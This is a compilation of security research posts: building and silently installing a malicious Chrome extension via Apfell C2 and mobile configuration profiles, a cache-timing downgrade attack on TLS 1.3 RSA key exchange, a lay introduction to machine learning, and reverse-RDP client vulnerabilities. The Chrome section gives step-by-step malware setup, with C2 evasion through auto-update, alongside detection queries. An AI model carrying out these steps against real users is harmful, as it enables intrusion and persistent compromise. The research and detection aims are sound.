Auto-update is a particularly useful feature for adversaries. In Figures 4 and 5, a malicious extension uses one domain for standard C2 comms and uses another domain to host the update manifest and extension file. Imagine the scenario where incident response has identified the C2 domain as malicious and blocks all traffic to that domain (1). However, traffic to the update URL is still permitted (2 & 3). An adversary can update the manifest version, change the C2 domain (4), the update URL, and even modify some of the extension's core code. After some time, Google Chrome will make a request to the update URL and load the new version of the extension with new C2 domains.

Figure 4

Figure 5

Additionally, if an attacker loses control of the extension, or perhaps it even crashed, they can remotely trigger execution with an update. As long as the extension remains installed, Chrome will continue to try and check for updates. If only the manifest version is updated, Chrome will re-install the extension and trigger its execution. Next, we'll cover how to use a PoC Chrome extension and manage the C2 server with Apfell.

Malicious Extensions: IRL

Apfell is a post-exploitation framework centered around customization and modularity. The framework targets the macOS platform by default, but a user can create new C2 profiles that target any platform. Apfell is an ideal framework to use for a malicious Chrome extension.
Let's walk through configuring a custom C2 profile and generating a payload.

1) For initial setup instructions, please see the apfell documentation here. Once the apfell server is up, register a new user and make yourself an admin. Next, you'll need to clone the apfell-chrome-ext-payload and apfell-chrome-extension-c2server projects onto your apfell server.

2) Navigate to manage operations -> payload management. The payloads for apfell-jxa and linfell are both defined on this page. For each payload, there are several commands defined. Any of these commands can be modified within the console and then updated in the agent (specifically for apfell-jxa and linfell). At the bottom left corner of the payloads page is an import button. This allows a user to import a custom payload, along with each command, from a json file. Please import this file to save some time creating the payload. If the import was successful, you should see chrome-extension as a new payload type with a few commands to start.

Figure 6

3) Now open a terminal session on your apfell server and navigate to the apfell-chrome-extension-c2server project. Run the install.sh script to install golang and compile the server binary. Verify that the server binary compiled successfully and is present in the $HOME/go/src/apfell-chrome-extension-c2server directory.

4) Navigate to Manage Operations -> C2 Profiles. Click on Register C2 profile on the bottom left of the page. Here you'll provide the name of the profile, description, and supported payloads. Upload the C2 server binary ($HOME/go/src/apfell-chrome-extension-c2server/server) and the C2 client code (./apfell-chrome-ext-payload/apfell/c2profiles/chrome-extension.js) for the extension.

Figure 7

5) Once the profile is submitted, the profiles page should update and show the new profile.

6) Back in your terminal session on the apfell server, edit the c2config.json file and choose the options you desire.

Figure 8

7) Copy the c2config.json to the apfell/app/c2profiles/default/chrome-extension/ directory. Rename the server binary to <c2profilename>_server. This is necessary in order to start the c2 server from the apfell UI. Now start the C2 server in apfell.

Figure 9

8) Navigate to Create Components -> Create Base Payload. Select chrome-extension for the C2 profile and payload type. Fill out the required parameters (Hostname, Port, Endpoint, SSL, and Interval). Provide the desired filename and then click submit. If all goes well, a success message will be displayed at the top of the page.

Figure 10

9) To download the payload, go to Manage Operations -> Payload Management. Now that you've setup the extension payload and C2 profile, you can export them to use in other operations.

10) Copy and paste all of the code from the payload into the chrome extension project file ./apfell-chrome-ext-payload/apfell/extension-skeleton/src/bg/main.js. Edit the manifest.json file in the extension-skeleton directory and replace all of the *_REPLACE values. The update_url does not need to be a legitimate URL if the auto update feature isn't used.

Figure 11

11) Open Google Chrome, click on More -> More Tools -> Extensions and toggle developer mode. Click on pack extension and select the extension-skeleton directory within the apfell-chrome-ext-payload project. Click on pack extension once again and Chrome will output the .crx file with the private key. Note that you'll need to keep the private key in order to update the extension.

12) The last piece of information you'll need is the application ID.
Unfortunately, the only way to obtain this is to install the extension and note the ID shown on the extensions page. Drag the extension file (.crx) onto the extensions page to install it.

Figure 12

13) Now you have the information needed to create your mobile configuration file and host the update manifest and crx file. Add the application ID and the url that points to the crx file to the update manifest file. Then add the application id and update_url to the example mobile configuration file here. Additionally, you'll need to add in two unique UUIDs.

Figure 13

Figure 14

14) Now the setup is complete! If everything is properly configured, installing the mobile configuration profile should trigger a silent install of the extension and add a new callback on the apfell active callbacks page. Refer to the Payload Delivery section for details on installing the profile.

Figure 15

Here's a quick demonstration of delivering a malicious chrome extension via a mobile configuration profile.

Detection

In the target infection section, we briefly covered a delivery mechanism for chrome extensions that allows for silent and hidden installs via mobile configuration profiles. From a defensive perspective, detections for this delivery mechanism should be focused on the profiles command and its arguments. This would be most suitable in a situation where the attacker already has access to the victim host. Specifically, the command for installing a profile looks like this: profiles install -type=configuration -path=/path/to/profile.mobileconfig. The corresponding osquery rule would look like this: "SELECT * FROM process_events WHERE cmdline LIKE '%profiles install%';". This may not be the best answer in an enterprise environment but it's a solid starting point. Also note that the osquery schema now includes a chrome_extensions table.

Additionally, when a profile is installed through the UI, the MCXCompositor process writes a binary plist to the /Library/Managed Preferences/username/ directory. The plist file is a copy of the mobile configuration profile. The filename is determined by the PayloadType key in the configuration profile.

Figure 16

There may be other data sources that enable more robust detections for the use of mobile configuration profiles but this should serve as a good start. Google Chrome extensions should definitely be considered for initial access and persistence. I would encourage other red teamers and security researchers to investigate the Chrome APIs for additional functionality.

Originally published at www.xorrior.com.

Sursa: https://posts.specterops.io/no-place-like-chrome-122e500e421f
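As a quick companion to the detection ideas above, the extension install path mentioned earlier in the article can be audited with a few lines of Python (the path is taken from the article; parsing is kept minimal):

import os

ext_dir = os.path.expanduser(
    "~/Library/Application Support/Google/Chrome/Default/Extensions")

# each sub-directory name is an installed extension's application ID
for app_id in sorted(os.listdir(ext_dir)):
    print(app_id)

Comparing this list against the IDs force-installed by configuration profiles is a cheap first triage step.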
21. Downgrade Attack on TLS 1.3 and Vulnerabilities in Major TLS Libraries

On November 30, 2018, we disclosed CVE-2019-5736... no: CVE-2018-12404, CVE-2018-19608, CVE-2018-16868, CVE-2018-16869, and CVE-2018-16870. These were from vulnerabilities found back in August 2018 in several TLS libraries.

Back on May 15, I approached Yuval Yarom with a few issues I had found in some TLS implementations. This led to a collaboration between Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, Yuval Yarom and me. Spearheaded by Eyal, the research has now been published here. And as you can see, the inventor of RSA himself is now recommending you to deprecate RSA in TLS.

We tested nine different TLS implementations against cache attacks and seven were found to be vulnerable: OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, and GnuTLS. The cat is not dead yet, with two lives remaining thanks to BearSSL (developed by my colleague Thomas Pornin) and Google's BoringSSL.

The attack leverages a side-channel leak via cache access timings of these implementations in order to break the RSA key exchanges of TLS implementations. The attack is interesting from multiple points of view (besides the fact that it affects many major TLS implementations):

It affects all versions of TLS (including TLS 1.3) and QUIC, where the latter version of TLS does not even offer an RSA key exchange! This prowess is achieved because of the only known downgrade attack on TLS 1.3.
It uses state-of-the-art cache attack techniques. Flush+Reload? Prime+Probe? Branch-Prediction? We have it.
The attack is very efficient. We found ways to ACTIVELY target any browser, slow some of them down, or use the long tail distribution to repeatedly try to break a session. We even make use of lattices to speed up the problem.
Manger and Ben-Or on RSA PKCS#1 v1.5. You heard of Bleichenbacher's million messages attack? Guess what, we found better. We use Manger's OAEP attack on RSA PKCS#1 v1.5 and even Ben-Or's algorithm, which is more efficient than and was published BEFORE Bleichenbacher's work in 1998.

I uploaded some of the code here.

To learn more about the research, you should read the white paper. I will talk specifically about protocol-level exploitation in this blog post.

Attacking RSA, The Origins

Although the research of Ben-Or et al. was initially used to support the security proofs of RSA, it also outlined attacks on the protocol. Fifteen years later, in 1998, Daniel Bleichenbacher discovers a padding oracle and devises a unique and practical attack of his own on RSA. The consequences are severe. Most TLS implementations could be broken, and thus mitigations were designed to prevent Daniel's attack. Follows a long series of "re-discovery" in which the world realizes that it is not so easy to implement the advised mitigations:

Bleichenbacher (CRYPTO 1998), also called the 1 million message attack, BB98, padding oracle attack on PKCS#1 v1.5, etc.
Klima et al. (CHES 2003)
Bleichenbacher's Attack Strikes Again: Breaking PKCS#1 v1.5 in XML Encryption (ESORICS 2012)
Degabriele et al. (CT-RSA 2012)
Bardou et al. (CRYPTO 2012)
Cross-Tenant Side-Channel Attacks in PaaS Clouds (CCS 2014)
Revisiting SSL/TLS Implementations: New Bleichenbacher Side Channels and Attacks (USENIX 2014)
On the Security of TLS 1.3 and QUIC Against Weaknesses in PKCS#1 v1.5 Encryption (CCS 2015)
DROWN (USENIX 2016)
Return Of Bleichenbacher's Oracle Threat (USENIX 2018)
The Dangers of Key Reuse: Practical Attacks on IPsec IKE (USENIX 2018)

Let's be realistic, the mitigations that developers had to implement were unrealistic. Furthermore, an implementation that would attempt to log such attacks would actually help the attacks. Isn't that funny?

The research I'm talking about today can be seen as one more of these "re-discoveries." My previous boss' boss (Scott Stender) once told me: "You can either be the first paper on the subject, or the best written one, or the last one." We're definitely not the first one, I don't know if we write that well, but we sure are hoping to be the last one.

RSA in TLS?

Briefly, SSL/TLS (except TLS 1.3) can use an RSA key exchange during a handshake to negotiate a shared secret. An RSA key exchange is pretty straightforward: the client encrypts a shared secret under the server's RSA public key, then the server receives it and decrypts it. If we can use our attack to decrypt this value, we can then passively decrypt the session (and obtain a cookie for example), or we can actively impersonate one of the peers.

Attacking Browsers, In Practice.

We employ the BEAST-attack model (in addition to being colocated with the victim server for the cache attack), which I have previously explained in a video here.

With this position, we then attempt to decrypt the session between a victim client (Bob) and bank.com: we can serve him with some javascript content that will continuously attempt new connections on bank.com. (If it doesn't attempt a new connection, we can force it by making the current one fail, since we're in the middle.)

Why several connections instead of just one? Because most browsers (except Firefox, which we can fool) will time out after some time (usually 30s). If an RSA key exchange is negotiated between the two peers: it's great, we have all the time in the world to passively attack the protocol. If an RSA key exchange is NOT negotiated: we need to actively attack the session to either downgrade or fake the server's RSA signature (more on that later). This takes time, because the attack requires us to send thousands of messages to the server. It will likely fail. But if we can try again, many times? It will likely succeed after a few trials. And that is why we continuously send connection attempts to bank.com.

Attacking TLS 1.3

Two ways exist to attack TLS 1.3. In each attack, the server needs to support an older version of the protocol as well.

The first technique relies on the fact that the current server's public key is an RSA public key, used to sign its ephemeral keys during the handshake, and that the older version of TLS that the server supports re-uses the same keys. The second one relies on the fact that both peers support an older version of TLS with a cipher suite supporting an RSA key exchange.

While TLS 1.3 does not use the RSA encryption algorithm for its key exchanges, it does use the signature algorithm of RSA for them; if the server's certificate contains an RSA public key, it will be used to sign its ephemeral public keys during the handshake. A TLS 1.3 client can advertise which RSA signature algorithm it wants to support (if any) between RSA and RSA-PSS.
As most TLS 1.2 servers already provide support for RSA, most will re-use their certificates instead of updating to the more recent RSA-PSS. RSA digital signatures specified per the standard are really close to the RSA encryption algorithm specified by the same document, so close that Bleichenbacher's decryption attack on RSA encryption also works to forge RSA signatures. Intuitively, we have pms^e, and the decryption attack allows us to find (pms^e)^d = pms; for forging signatures, we can pretend that the content to be signed tbs (see RFC 8446) is tbs = pms^e and obtain tbs^d via the attack, which is by definition the signature over the message tbs. However, this signature forgery requires an additional step (blinding) in the conventional Bleichenbacher attack. In practice this can lead to hundreds of thousands of additional messages.

The TLS 1.3 signature forgery attack using a TLS 1.2 server as Bleichenbacher oracle.

Key-Reuse has been shown in the past to allow for complex cross-protocol attacks on TLS. Indeed, we can successfully forge our own signature of the handshake transcript (contained in the CertificateVerify message) by negotiating a previous version of TLS with the same server. The attack can be carried out if this new connection exposes a length or Bleichenbacher oracle with a certificate using the same RSA key but for key exchanges.

Downgrading to TLS 1.2

Every TLS connection starts with a negotiation of the TLS version and other connection attributes. As the new version of TLS (1.3) does not offer an RSA key exchange, the exploitation of our attack must first begin with a downgrade to an older version of TLS. TLS 1.3 being relatively recent (August 2018), most servers supporting it will also support older versions of TLS (which all provide support for RSA key exchanges). A server not supporting TLS 1.3 would thus respond with an older TLS version's (TLS 1.2 in our example) ServerHello message. To downgrade a client's connection attempt, we can simply spoof this answer from the server. Besides protocol downgrades, other techniques exist to force browser clients to fall back onto older TLS versions: network glitches, a spoofed TCP RST packet, a lack of response, etc. (see POODLE).

The TLS 1.3 attack downgrades the victim to an older version of TLS.

Continuing with a spoofed TLS 1.2 handshake, we can simply present the server's RSA certificate in a ServerCertificate message and then end the handshake with a ServerHelloDone message. At this point, if the server does not have a trusted certificate allowing for RSA key exchanges, or if the client refuses to support RSA key exchanges or older versions than TLS 1.2, the attack is stopped. Otherwise, the client uses the RSA public key contained in the certificate to encrypt the TLS premaster secret, sends it in a ClientKeyExchange message and ends its part of the handshake with a ChangeCipherSpec and a Finished message.

The decryption attack performs a new handshake with the server, using a modified encrypted premaster secret obtained from the victim's ClientKeyExchange message.

At this point, we need to perform our attack in order to decrypt the RSA encrypted premaster secret. The last Finished message that we send must contain an authentication tag (with HMAC) of the whole transcript, in addition to being encrypted with the transport keys derived from the premaster secret.
While some clients will have no handshake timeouts, most serious applications like browsers will give up on the connection attempt if our response takes too much time to arrive. While the attack only takes a few thousand messages, this might still be too much in practice. Fortunately, several techniques exist to slow down the handshake:

we can send the ChangeCipherSpec message, which might reset the client's timer
we can send TLS warning alerts to reset the handshake timer

Once the decryption attack terminates, we can send the expected Finished message to the client and finalize the handshake. From there everything is possible, from passively relaying and observing messages to the impersonated server through to actively tampering requests made to it.

This downgrade attack bypasses multiple downgrade mitigations: one server-side and two client-side. TLS 1.3 servers that negotiate older versions of TLS must advertise this information to their peers. This is done by setting a quarter of the bytes from the server_random field in the ServerHello message to a known value. TLS 1.3 clients that end up negotiating an older version of TLS must check for these values and abort the handshake if found. But as noted by the RFC, "It does not provide downgrade protection when static RSA is used." - Since we alter this value to remove the warning bytes, the client has no opportunity to detect our attack. On the other hand, a TLS 1.3 client that ends up falling back to an older version of TLS must advertise this information in their subsequent client hellos; since we impersonate the server, we can simply ignore this warning. Furthermore, a client also includes the version used by the client hello inside of the encrypted premaster secret. For the same reason as previously, this mitigation has no effect on our attack. As it stands, RSA is the only known downgrade attack on TLS 1.3, which we are the first to successfully exploit in this research.

Attacking TLS 1.2

As with the previous attack, both the client and the server targeted need to support RSA key exchanges. As this is a typical key exchange, most known browsers and servers support them, although they will often prefer to negotiate a forward secret key exchange based on ephemeral versions of the Elliptic Curve or Finite Field Diffie-Hellman key exchanges. This is done as part of the cipher suite negotiation during the first two handshake messages. To avoid this outcome, the ClientHello message can be intercepted and modified to strip it of any non-RSA key exchanges advertised. The server will then only choose from a set of RSA-key-exchange-based cipher suites, which will allow us to perform the same attack as previously discussed. Our modification of the ClientHello message can only be detected with the Finished message authenticating the correct handshake transcript, but since we are in control of this message, we can forge the expected tag.

The attack on TLS 1.2 modifies the client's first packet to force an RSA key exchange.

On the other side, if both peers end up negotiating an RSA key exchange on their own, we can passively observe the connection and take our time to break the session.

Take Aways

For each vulnerability discovered, there are three pieces of articles you can read: the first paper, the best explanation on the subject, and finally the last paper. We're hoping to be the last paper.
The last 20 years of attacks that have been re-discovering Bleichenbacher's seminal work in 1998 clearly show that it is close to impossible to correctly implement the RSA PKCS#1 v1.5 encryption scheme. While our paper recommends a series of mitigations, it is time for RSA PKCS#1 v1.5 to be deprecated and replaced by more modern schemes like OAEP and ECIES for asymmetric encryption or Elliptic Curve Diffie-Hellman for key exchanges.

Finally, we note that keyless implementations of TLS are attractive targets, but are most often closed source and thus were not analyzed in this work.

Published date: 07 February 2019

Written by: David Wong

Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/february/downgrade-attack-on-tls-1.3-and-vulnerabilities-in-major-tls-libraries/
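The blinding step mentioned above relies on a basic malleability property of textbook RSA, which a toy Python example makes explicit (textbook-sized numbers, obviously not a real attack):

# Toy RSA: n = 61 * 53, e = 17, d = 2753
n, e, d = 3233, 17, 2753

m = 65
c = pow(m, e, n)                     # ciphertext of m

# Multiplying the ciphertext by s^e multiplies the plaintext by s:
s = 2
c_blinded = (c * pow(s, e, n)) % n
assert pow(c_blinded, d, n) == (m * s) % n

Bleichenbacher-style attacks iterate exactly this trick, using the oracle's answers about (c * s^e) mod n to progressively narrow down m.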
  22. Machine Learning for Everyone

In simple words. With real-world examples. Yes, again.

21 November 2018 :: 28834 views :: 8137 words

This article in other languages: Russian (original)

Special thanks for help: @wcarss, @sudodoki and my wife ❤️

Machine Learning is like sex in high school. Everyone is talking about it, a few know what to do, and only your teacher is doing it. If you ever tried to read articles about machine learning on the Internet, most likely you stumbled upon two types of them: thick academic trilogies filled with theorems (I couldn't even get through half of one) or fishy fairytales about artificial intelligence, data-science magic, and jobs of the future.

I decided to write a post I've been wishing existed for a long time: a simple introduction for those who always wanted to understand machine learning. Only real-world problems, practical solutions, simple language, and no high-level theorems. One for everyone, whether you are a programmer or a manager. Let's roll.

Why do we want machines to learn?

This is Billy. Billy wants to buy a car. He tries to calculate how much he needs to save monthly for that. He went over dozens of ads on the internet and learned that new cars are around $20,000, used year-old ones are $19,000, 2-year-old ones are $18,000, and so on.

Billy, our brilliant analyst, starts seeing a pattern: the car price depends on its age and drops $1,000 every year, but won't get lower than $10,000.

In machine learning terms, Billy invented regression – he predicted a value (price) based on known historical data. People do it all the time, whether trying to estimate a reasonable cost for a used iPhone on eBay or figuring out how many ribs to buy for a BBQ party. 200 grams per person? 500?

Yeah, it would be nice to have a simple formula for every problem in the world. Especially for a BBQ party. Unfortunately, it's impossible.

Let's get back to cars. The problem is that they have different manufacturing dates, dozens of options, technical condition, seasonal demand spikes, and god only knows how many more hidden factors. An average Billy can't keep all that data in his head while calculating the price. Me neither. People are dumb and lazy – we need robots to do the maths for them. So, let's go the computational way here: let's provide the machine some data and ask it to find all the hidden patterns related to price. Aaaand it works. The most exciting thing is that the machine copes with this task much better than a real person does when carefully analyzing all the dependencies in their mind.

That was the birth of machine learning.

Full article: https://vas3k.com/blog/machine_learning/
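A quick illustration from me, not from the article: Billy's hand-rolled "regression" is literally a one-line formula, with the $20,000 starting price, the $1,000-per-year drop and the $10,000 floor taken straight from the example:

    #include <algorithm>
    #include <cstdio>

    // Billy's price estimate: $20,000 minus $1,000 per year of age,
    // but never below $10,000.
    int estimated_price(int age_years) {
        return std::max(20000 - 1000 * age_years, 10000);
    }

    int main() {
        for (int age = 0; age <= 12; ++age)
            std::printf("%2d-year-old car: $%d\n", age, estimated_price(age));
    }

Machine learning, as the article goes on to explain, is about having the machine derive such a formula (and far messier ones) from the data itself.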
  23. Reverse RDP Attack: Code Execution on RDP Clients

February 5, 2019

Research by: Eyal Itkin

Overview

Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help those working remotely or to work in a safe VM environment, RDP clients are an invaluable tool.

However, Check Point Research recently discovered multiple critical vulnerabilities in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the IT professional or security researcher's computer. Such an infection could then allow for an intrusion into the IT network as a whole.

We found 16 major vulnerabilities and a total of 25 security vulnerabilities overall. The full list can be found in Appendices A & B.

Introduction

The Remote Desktop Protocol (RDP), also known as "mstsc" after the Microsoft built-in RDP client, is commonly used by technical users and IT staff to connect to and work on a remote computer. RDP is a proprietary protocol developed by Microsoft and is usually used when a user wants to connect to a remote Windows machine. There are also some popular open-source clients for the RDP protocol that are used mainly by Linux and Mac users.

RDP offers many complex features, such as compressed video streaming, clipboard sharing, and several encryption layers. We therefore decided to look for vulnerabilities in the protocol and its popular implementations.

In a normal scenario, you use an RDP client and connect to a remote RDP server that is installed on the remote computer. After a successful connection, you have access to and control of the remote computer, according to the permissions of your user. But what if the scenario could be put in reverse? We wanted to investigate whether the RDP server can attack and gain control over the computer of the connected RDP client.

Figure 1: Attack scenario for the RDP protocol

There are several common scenarios in which an attacker can gain elevated network permissions by deploying such an attack, thus advancing their lateral movement inside an organization:

- Attacking an IT member that connects to an infected work station inside the corporate network, thus gaining higher permission levels and greater access to the network systems.
- Attacking a malware researcher that connects to a remote sandboxed virtual machine that contains tested malware. This allows the malware to escape the sandbox and infiltrate the corporate network.

Now that we had decided on our attack vector, it was time to introduce our targets, the most commonly used RDP clients:

- mstsc.exe – Microsoft's built-in RDP client.
- FreeRDP – The most popular and mature open-source RDP client on GitHub.
- rdesktop – An older open-source RDP client, which comes by default in Kali Linux distros.

Fun fact: As "rdesktop" is the built-in client in Kali Linux, a Linux distro used by red teams for penetration testing, we thought of a third (though probably not practical) attack scenario: blue teams can install organizational honeypots and attack red teams that try to connect to them through the RDP protocol.

Open-Source RDP Clients

As is usually the case, we decided to start looking for vulnerabilities in the open-source clients. It seemed that it would only make sense to start reverse engineering Microsoft's client once we had a firm understanding of the protocol.
In addition, if we found common vulnerabilities in the two open-source clients, we could check whether they also applied to Microsoft's client. In a recon check, it looked like "rdesktop" is smaller than "FreeRDP" (it has fewer lines of code), so we selected it as our first target.

Note: We decided to perform an old-fashioned manual code audit instead of using any fuzzing technique. The main reasons for this decision were the overhead of writing a dedicated fuzzer for the complex RDP protocol, together with the fact that using AFL for a protocol with several compression and encryption layers didn't look like a good idea.

rdesktop

Tested version: v1.8.3

After a short period, it looked like the decision to manually search for vulnerabilities had paid off. We soon found several vulnerable patterns in the code, making it easier to "feel" the code and pinpoint the locations of possible vulnerabilities. We found 11 vulnerabilities with a major security impact, and 19 vulnerabilities overall in the library. For the full list of CVEs for "rdesktop", see Appendix A.

Note: An additional recon check showed that the xrdp open-source RDP server is based on the code of "rdesktop". Based on our findings, it appears that similar vulnerabilities can be found in "xrdp" as well.

Instead of a technical analysis of all of the CVEs, we will focus on two common vulnerable code patterns that we found.

Remote Code Executions – CVEs 2018-20179 – 2018-20181

Throughout the code of the client, there is an assumption that the server sent enough bytes to the client to process. One example of this assumption can be found in the following code snippet in Figure 2:

Figure 2: Parsing 2 fields from stream "s" without first checking its size

As we can see, the fields "length" and "flags" are parsed from the stream "s" without checking that "s" indeed contains the required 8 bytes for this parsing operation. While this usually only leads to an Out-Of-Bounds read, we can combine this vulnerability with an additional vulnerability in several of the inner channels and achieve a much more severe effect.

There are three logical channels that share a common vulnerability:

- lspci
- rdpsnddbg – yes, this debug channel is always active
- seamless

The vulnerability itself can be seen in Figure 3:

Figure 3: Integer-Underflow when calculating the remaining "pkglen"

By reading too much data from the stream, i.e. sending a chopped packet to the client, the invariant that "s->p <= s->end" breaks. This leads to an Integer-Underflow when calculating "pkglen", and to an additional Integer-Overflow when allocating "xmalloc(pkglen + 1)" bytes for our buffer, as can be seen in my comment above the call to "xmalloc". Together with the proprietary implementation of "STRNCPY", seen in Figure 4, we can trigger a massive heap-based buffer overflow when copying data to the tiny allocated heap buffer.

Figure 4: Proprietary implementation of the "strncpy" function

By chaining together these two vulnerabilities, found in three different logical channels, we now have three remote code execution vulnerabilities.

CVE 2018-8795 – Remote Code Execution

Another classic vulnerability is an Integer-Overflow when processing the received bitmap (screen content) updates, as can be seen in Figure 5:

Figure 5: Integer-Overflow when processing bitmap updates

Although "width" and "height" are only 16 bits each, by multiplying them together with "Bpp" (bits-per-pixel), we can trigger an Integer-Overflow.
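To make the overflow concrete, here is a minimal sketch of the vulnerable pattern (an illustration of the bug class, not the actual rdesktop code):

    #include <cstdint>
    #include <cstdio>

    int main() {
        // All of these values arrive from the (malicious) server.
        uint16_t width  = 0xFFFF;
        uint16_t height = 0xFFFF;
        int      Bpp    = 4;  // bytes-per-pixel, derived from bits-per-pixel

        // width and height are promoted to int, so the product
        // 0xFFFF * 0xFFFF * 4 exceeds the 32-bit signed range (formally
        // undefined behavior; in practice it wraps on common compilers),
        // yielding an allocation size far smaller than the amount of data
        // the decompression code will later write.
        int size = width * height * Bpp;
        std::printf("allocation size: %d\n", size);
    }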
Later on, the bitmap decompression will process our input and break on any decompression error, giving us a controllable heap-based buffer overflow.

Note: This tricky calculation can be found in several places throughout the code of "rdesktop", so we marked it as a potential vulnerability to check for in "FreeRDP".

FreeRDP

Tested version: 2.0.0-rc3

After finding multiple vulnerabilities in "rdesktop", we approached "FreeRDP" with some trepidation; perhaps only "rdesktop" had vulnerabilities when implementing RDP? We still couldn't be sure that every implementation of the protocol would be vulnerable. And indeed, at first glance, the code seemed much better: there are minimal-size checks before parsing data from the received packet, and the code "feels" more mature. It was going to be a challenge.

However, after a deeper examination, we started to find cracks in the code, and eventually we found critical vulnerabilities in this client as well. We found 5 vulnerabilities with major security impact, and 6 vulnerabilities overall in the library. For the full list of CVEs for "FreeRDP", see Appendix B.

Note: An additional recon check showed that the RDP client NeutrinoRDP is a fork of an older version (1.0.1) of "FreeRDP" and therefore probably suffers from the same vulnerabilities.

At the end of our research, we developed a PoC exploit for CVE 2018-8786, as can be seen in this video:

CVE 2018-8787 – Same Integer-Overflow

As we saw earlier in "rdesktop", calculating the dimensions of a received bitmap update is susceptible to Integer-Overflows. And indeed, "FreeRDP" shares the same vulnerability:

Figure 6: Same Integer-Overflow when processing bitmap updates

Remote Code Execution – CVE 2018-8786

Figure 7: Integer-Truncation when processing bitmap updates

As can be seen in Figure 7, there is an Integer-Truncation when trying to calculate the required capacity for the bitmap updates array. Later on, rectangle structs will be parsed from our packet into the memory of the too-small allocated buffer. This specific vulnerability is followed by a controlled amount ("bitmapUpdate->number") of heap allocations (with a controlled size) when the rectangles are parsed and stored in the array, granting the attacker a great heap-shaping primitive. The downside of this vulnerability is that most of the rectangle fields are only 16 bits wide and are upcast to 32 bits to be stored in the array. Despite this, we managed to exploit this CVE in our PoC: even this partially controlled heap-based buffer overflow is enough for a remote code execution.

Mstsc.exe – Microsoft's RDP Client

Tested version: Build 18252.rs_prerelease.180928-1410

After we finished checking the open-source implementations, we felt that we had a pretty good understanding of the protocol and could start to reverse engineer Microsoft's RDP client. But first things first, we needed to find which binaries contain the logic we wanted to examine. The *.dll and *.exe files we chose to focus on:

- rdpbase.dll – Protocol layer for the RDP client.
- rdpserverbase.dll – Protocol layer for the RDP server.
- rdpcore.dll / rdpcorets.dll – Core logic for the RDP engine.
- rdpclip.exe – An .exe we found and that we will introduce later on.
- mstscax.dll – Mostly the same RDP logic, used by mstsc.exe.

Testing prior vulnerabilities

We started by testing our PoCs for the vulnerabilities in the open-source clients. Unfortunately, all of them caused the client to close itself cleanly, without any crash.
Having no more excuses, we opened IDA and started to track the flow of the messages. Soon enough, we realized that Microsoft's implementation is much better than the implementations we tested previously. Actually, it seems like Microsoft's code is better by several orders of magnitude, as it contains:

- Several optimization layers for efficient network streaming of the received video.
- Robust input checks.
- Robust decompression checks, to guarantee that no byte will be written past the destination buffer.
- Additional supported clipboard features.
- ...

Needless to say, there were checks for Integer-Overflows when processing bitmap updates.

Wait a minute, they share a clipboard?

When we checked "rdesktop" and "FreeRDP", we found several vulnerabilities in the clipboard sharing channel (every logical data layer is called a channel). However, at the time, we didn't pay much attention to them because those clients only shared two formats: raw text and Unicode text. This time it seemed that Microsoft supports several more shared data formats, as the switch table we saw was much bigger than before. After reading more about the different formats in MSDN, one format immediately attracted our attention: "CF_HDROP". This format seems responsible for "Drag & Drop" (hence the name HDROP) and, in our case, the "Copy & Paste" feature. It's possible to simply copy a group of files from the first computer and paste them on the second computer. For example, a malware researcher might want to copy the output log of his script from the remote VM to his desktop.

It was roughly at this point, while I was trying to figure out the flow of the data, that Omer (@GullOmer) asked me if and where PathCanonicalizeA is called. If the client fails to properly canonicalize and sanitize the file paths it receives, it could be vulnerable to a path-traversal attack, allowing the server to drop arbitrary files in arbitrary paths on the client's computer – a very strong attack primitive. After failing to find imports for the canonicalization function, we dug in deeper, trying to figure out the overall architecture of this data flow. Figure 8 summarizes our findings:

Figure 8: Architecture of the clipboard sharing in Microsoft's RDP

This is where rdpclip.exe comes into play. It turns out that the server accesses the clipboard through a broker, and that broker is rdpclip.exe. In fact, rdpclip.exe is just a normal process (we can kill / spawn it ourselves) that talks to the RDP service using a dedicated virtual channel API.

At this stage, we installed ClipSpy and started to dynamically debug the clipboard data handling done inside rdpclip.exe. These are our conclusions regarding the data flow in an ordinary "Copy & Paste" operation in which a file is copied from the server to the client:

- On the server, the "copy" operation creates clipboard data in the "CF_HDROP" format.
- When the "paste" is performed on the client's computer, a chain of events is triggered.
- The rdpclip.exe process on the server is asked for the clipboard's content, and converts it to a FileGroupDescriptor (Fgd) clipboard format.
- The metadata of the files is added to the descriptor one at a time, using the HdropToFgdConverter::AddItemToFgd() function.
- After it is finished, the Fgd blob is sent to the RDP service on the server.
- The server simply wraps it and sends it to the client.
- The client unwraps it and stores it in its own clipboard.
- A "paste" event is sent to the process of the focused window (for example, explorer.exe).
- This process handles the event and reads the data from the clipboard.
- The content of the files is received over the RDP connection itself.

Path Traversal over the shared RDP clipboard

If we look back at the steps performed on the received clipboard data, we notice that the client doesn't verify the received Fgd blob that came from the RDP server. And indeed, if we modify the server to include a path-traversal path of the form ..\canary1.txt, ClipSpy shows us (see Figure 9) that it is stored "as is" on the client's clipboard:

Figure 9: Fgd with a path traversal stored on the client's clipboard

In Figure 10, we can see how explorer.exe treats a path traversal of ..\filename.txt:

Figure 10: Fgd with a path traversal as explorer.exe handles it

Just to make sure, after the "paste" in folder "Inner", the file is stored in "Base" instead:

Figure 11: Folders after a successful path-traversal attack

And that's practically it. If a client uses the "Copy & Paste" feature over an RDP connection, a malicious RDP server can transparently drop arbitrary files in arbitrary file locations on the client's computer, limited only by the permissions of the client. For example, we can drop malicious scripts to the client's "Startup" folder, and after a reboot they will be executed on the client's computer, giving us full control.

Note: In our exploit, we simply killed rdpclip.exe and spawned our own process to perform the path-traversal attack by adding an additional malicious file to every "Copy & Paste" operation. The attack was performed with "user" permissions, and does not require the attacker to have "system" or any other elevated permission.

Here is a video of our PoC exploit:

Taking it one step further

Every time a clipboard is updated on either side of the RDP connection, a CLIPRDR_FORMAT_LIST message is sent to the other side, to notify it about the new clipboard formats that are now available. We can think of it as a complete sync between the clipboards of both parties (except for a small set of formats that are treated differently by the RDP connection itself). This means that our malicious server is notified whenever the client copies something to its "local" clipboard, and the server can then query the values and read them. In addition, the server can notify the client about a clipboard "update" without the need for a "copy" operation inside the RDP window, thus completely controlling the client's clipboard without being noticed.

Scenario #1: A malicious RDP server can eavesdrop on the client's clipboard – this is a feature, not a bug. For example, the client locally copies an admin password, and now the server has it too.

